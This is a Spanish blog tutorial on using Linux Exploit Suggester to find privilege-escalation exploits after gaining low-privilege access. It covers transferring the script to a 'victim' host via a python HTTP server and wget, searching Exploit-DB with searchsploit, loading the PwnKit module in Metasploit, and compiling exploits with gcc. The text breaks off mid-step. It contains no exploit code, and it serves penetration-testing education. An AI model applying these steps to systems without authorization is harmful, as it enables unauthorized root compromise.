Linux Exploit Suggester: Guía Rápida

https://www.onlinetis.com/es/

Linux Exploit Suggester: Guía Rápida

Linux Exploit Suggester (LES) es una de las herramientas más queridas en el mundo del pentesting cuando se trata de escalada de privilegios en sistemas Linux.

Básicamente, es un script que analiza el kernel y el sistema operativo de una máquina para decirte: "Oye, basándome en esta versión de Linux, estos son los exploits que probablemente funcionarán para que te conviertas en root".

Aquí tienes una guía rápida en español para entender cómo funciona y cómo usarlo:


🚀 ¿Para qué sirve?

Cuando consigues acceso a una máquina Linux con un usuario de pocos privilegios (como www-data), tu siguiente objetivo es ser root.

LES automatiza la búsqueda de vulnerabilidades conocidas comparando la versión del kernel del objetivo con una base de datos de exploits (como los famosos Dirty COW, PwnKit, etc.).

Características principales:

  • Ligero: Es un simple script en Bash (o Perl, dependiendo de la versión).

  • Sin dependencias: No necesita instalar librerías raras, lo cual es vital si estás en una máquina "víctima".

  • Reporte detallado: Te da el nombre del exploit, el código CVE y, a menudo, el enlace para descargarlo.


🛠️ Cómo usarlo en Kali Linux

Aunque puedes tenerlo en tu máquina Kali, lo normal es transferirlo a la máquina que quieres comprometer.

1. Obtener el script

En tu Kali, puedes clonar el repositorio oficial:

Bash
git clone https://github.com/mzet-/linux-exploit-suggester.git
cd linux-exploit-suggester

2. Ejecutarlo (Escenario típico)

Si ya estás dentro de la máquina objetivo, simplemente ejecuta:

Bash
./linux-exploit-suggester.sh

3. Interpretar los resultados

El script te mostrará una lista clasificada por "Probabilidad" (Exposure):

  • Highly probable: Son los primeros que deberías probar.

  • Probable: Tienen buena pinta, pero podrían fallar según la configuración.


💡 Consejos Pro

  • Transferencia rápida: Si tienes acceso por consola a la víctima, puedes levantar un servidor temporal en Kali con python3 -m http.server 80 y luego desde la víctima usar wget http://tu-ip/les.sh.

  • Mantente actualizado: El kernel de Linux cambia rápido. Asegúrate de bajar la última versión del script antes de una auditoría importante para no perderte nuevos exploits como los de los últimos años (ej. Looney Tunables).

  • No es infalible: Que el script sugiera un exploit no significa que vaya a funcionar al 100%. A veces las protecciones como ASLR o parches específicos del fabricante bloquean la ejecución.

 

Una vez que Linux Exploit Suggester (LES) te da una lista de posibles vulnerabilidades, el siguiente paso es encontrar el código (el "exploit") para ejecutarlo.

Aquí te explico las tres vías principales para buscar y descargar esos exploits de forma segura y eficiente:


1. Usar searchsploit (Directo en Kali Linux)

Kali tiene una copia local de la base de datos de Exploit-DB. Es la forma más rápida de buscar sin necesidad de internet.

Si LES te sugiere, por ejemplo, "Dirty COW" o el CVE-2021-4034 (PwnKit), haz lo siguiente:

  • Buscar por nombre o CVE:

    Bash
    searchsploit PwnKit
    # O por número de CVE
    searchsploit CVE-2021-4034
    
  • Ver la ruta del archivo: Si encuentras uno que te sirve, usa el parámetro -p para ver la ruta completa del archivo .c o .py.

    Bash
    searchsploit -p 40839
    
  • Copiarlo a tu carpeta actual:

    Bash
    searchsploit -m 40839
    

2. Bases de Datos Online (Las más confiables)

Si prefieres ver el código en el navegador o buscar explicaciones detalladas, estas son las fuentes de referencia:

Sitio WebPara qué sirve
Exploit-DBEl estándar de la industria. Contiene el código fuente verificado.
GitHubIdeal para encontrar versiones "modernas" o scripts de automatización para CVEs recientes.
NVD (NIST)Para leer la descripción técnica oficial de la vulnerabilidad.

3. Metasploit Framework

Si el exploit es muy conocido, es probable que ya exista un módulo dentro de Metasploit, lo cual facilita mucho la post-explotación.

  1. Abre la consola: msfconsole

  2. Busca el exploit: search type:exploit platform:linux name:pwnkit

  3. Selecciona el módulo: use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec


⚠️ Pasos críticos antes de ejecutar

No es solo "descargar y listo". Casi siempre tendrás que preparar el archivo:

  1. Revisar el código: Abre el archivo con cat o nano. Muchos exploits de Exploit-DB tienen instrucciones en los comentarios de la parte superior sobre cómo compilarlo.

  2. Compilación (si es un .c): Normalmente se usa GCC en la máquina objetivo:

    Bash
    gcc exploit.c -o exploit_ejecutable
    
  3. Dar permisos: ```bash

    chmod +x exploit_ejecutable

Entradas populares de este blog

Hacking y ciberseguridad en kali linux con Fping

Hacking y ciberseguridad en kali linux con atk6-thcping6

Como utilizar Fierce en kali linux